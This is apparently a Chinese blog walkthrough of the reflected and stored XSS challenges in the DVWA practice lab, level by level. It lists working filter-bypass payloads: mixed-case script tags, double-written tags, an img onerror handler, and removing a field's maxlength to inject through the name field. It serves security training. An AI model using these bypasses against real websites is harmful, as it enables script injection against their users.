DVWA靶场中的xss-反射型xss、存储型xss的low、medium、high的详细通关方法

news2024/11/29 13:48:50

1.DVWA反射型xss

（1）Low：

（2）Medium：

（3）Heigh

2.xss存储型

（1）Low：

（2）Medium

（3）Heigh

1.DVWA反射型xss

（1）Low：

输入<script>alert(1)</script>

点击submit则会有弹窗显示

（2）Medium：

输入<script>alert(1)</script>

没有弹窗显示

尝试闭合，输入"><script>alert(1)</script>

也没有弹窗显示

点击这个查看源代码

发现<script>被丢掉了，因此考虑大小写

输入"><sCript>alert(1)</scRipt>

有弹窗显示

尝试使用<img>标签

输入<img src=# οnerrοr=alert(1)>=

有弹窗显示

尝试双写绕过

<scr<script>ipt>alert(1)</scr<script>ipt>

也有弹窗显示

用html编码绕过进行尝试

没有弹窗显示

（3）Heigh

输入<script>alert(1)</script>

没有弹窗显示

尝试闭合，输入"><script>alert(1)</script>

也没有弹窗显示

点击这个查看源代码

包含/<script>任意一个字母就会被丢掉

所以不能使用<script>标签去做

所以尝试用<img>

输入<img src=# οnerrοr=alert(1)>

有弹窗显示

2.xss存储型

（1）Low：

输入<script>alert(1)</script>

有弹窗显示

（2）Medium

输入<script>alert(1)</script>

点击提交

没有弹窗

尝试大小写，双写，img，HTML编码均没有反应

那么就尝试换个方向

去改变它的name，尝试在name中注入xss

因为查看源代码时发现neme的长度最大时10

那么我们则需要去修改源代码把maxlength删除，删除之后再在name插入xss代码

考虑大小写

输入"><sCript>alert(1)</scRipt>

有弹窗显示

尝试使用<img>标签

输入<img src=# οnerrοr=alert(1)>

有弹窗显示

尝试双写绕过

<scr<script>ipt>alert(1)</scr<script>ipt>

也有弹窗显示

用html编码绕过进行尝试

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

没有弹窗显示

（3）Heigh

与中级同理在尝试从message注入不成功后，便转为在name上面注入

尝试用img标签注入

有弹窗显示

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1348543.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！